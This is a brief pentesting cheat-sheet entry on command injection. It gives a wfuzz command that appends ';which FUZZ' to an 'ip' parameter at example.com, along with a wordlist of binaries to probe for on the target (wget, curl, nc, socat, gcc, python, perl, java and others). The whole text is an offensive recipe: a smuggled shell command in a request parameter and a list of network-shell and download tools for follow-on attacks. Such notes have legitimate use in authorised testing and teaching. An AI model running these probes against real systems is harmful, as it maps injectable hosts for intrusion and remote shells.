Enumerating Command Injection Capabilities
- Fuzzing for useful commands
wfuzz -c -z file,capability_check_custom.txt --hc 404 "http://example.com/php/index.php?ip=127.0.0.1;which FUZZ"
- Content of capability_check_custom.txt
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat
ss
ifconfig
ip
hostname
php
python
python3
perl
java